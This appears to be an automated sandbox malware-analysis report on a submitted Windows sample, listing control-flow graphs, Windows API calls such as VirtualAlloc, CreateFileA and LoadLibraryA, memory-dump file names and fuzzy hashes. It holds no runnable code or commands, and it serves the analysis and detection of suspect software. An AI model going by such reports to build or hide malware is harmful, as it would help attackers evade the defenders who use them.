                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: .tmp$y@
                                                                            • API String ID: 2030045667-2396523267
                                                                            • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                            • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                            • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                            • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: .tmp$y@
                                                                            • API String ID: 2030045667-2396523267
                                                                            • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                            • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                            • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                            • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                            • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                            • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                            • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 261 401430-40143d 262 401446-40144c 261->262 263 40143f-401444 261->263 264 401452-40146a VirtualAlloc 262->264 263->264 265 40146c-40147a call 4012e4 264->265 266 40148f-401492 264->266 265->266 269 40147c-40148d VirtualFree 265->269 269->266
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID: Y
                                                                            • API String ID: 2087232378-1754117475
                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 330 407749-40774a 331 4076dc-4076e6 WriteFile 330->331 332 40774c-40776f 330->332 334 4076e8-4076ea call 40748c 331->334 335 4076ef-4076f2 331->335 333 407770-407785 332->333 338 407787 333->338 339 4077f9 333->339 334->335 336 407700-407704 335->336 337 4076f4-4076fb call 4073ec 335->337 337->336 342 40778a-40778f 338->342 343 4077fd-407802 338->343 344 40783b-40783d 339->344 345 4077fb 339->345 348 407803-407819 342->348 350 407791-407792 342->350 343->348 346 407841-407843 344->346 345->343 349 40785b-40785c 346->349 348->349 360 40781b 348->360 351 4078d6-4078eb call 407890 InterlockedExchange 349->351 352 40785e-40788c 349->352 353 407724-407741 350->353 354 407794-4077b4 350->354 375 407912-407917 351->375 376 4078ed-407910 351->376 369 407820-407823 352->369 370 407890-407893 352->370 356 407743 353->356 357 4077b5 353->357 354->357 361 407746-407747 356->361 362 4077b9 356->362 364 4077b6-4077b7 357->364 365 4077f7-4077f8 357->365 367 40781e-40781f 360->367 361->330 368 4077bb-4077cd 361->368 362->368 364->362 365->339 367->369 368->346 373 4077cf-4077d4 368->373 372 407898 369->372 374 407824 369->374 370->372 379 40789a 372->379 373->344 380 4077d6-4077de 373->380 378 407825 374->378 374->379 376->375 376->376 381 407896-407897 378->381 382 407826-40782d 378->382 383 40789f 379->383 380->333 393 4077e0 380->393 381->372 385 4078a1 382->385 386 40782f 382->386 383->385 390 4078a3 385->390 391 4078ac 385->391 388 407832-407833 386->388 389 4078a5-4078aa 386->389 388->344 388->367 392 4078ae-4078af 389->392 390->389 391->392 392->383 394 4078b1-4078bd 392->394 393->365 394->372 395 4078bf-4078c0 394->395
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                            • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                            • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                            • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 396 401658-40168d 397 4016c7-4016cd 396->397 398 40168f-40169a 397->398 399 4016cf-4016d4 397->399 400 40169c 398->400 401 40169f-4016a1 398->401 400->401 402 4016a3 401->402 403 4016a5-4016a7 401->403 402->403 404 4016c5 403->404 405 4016a9-4016b9 VirtualFree 403->405 404->397 405->404 406 4016bb 405->406 406->404
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: Y
                                                                            • API String ID: 1263568516-1754117475
                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 407 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLibraryLoadMode
                                                                            • String ID:
                                                                            • API String ID: 2987862817-0
                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 411 40762c-40764a ReadFile 412 407663-40766a 411->412 413 40764c-407650 411->413 414 407652-40765a GetLastError 413->414 415 40765c-40765e call 40748c 413->415 414->412 414->415 415->412
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                              • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID:
                                                                            • API String ID: 1658689577-0
                                                                            • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                            • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                            • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                            • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                            • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                            APIs
                                                                            • SetEndOfFile.KERNEL32(?,02113FF4,0040A08C,00000000), ref: 004076B3
                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 734332943-0
                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
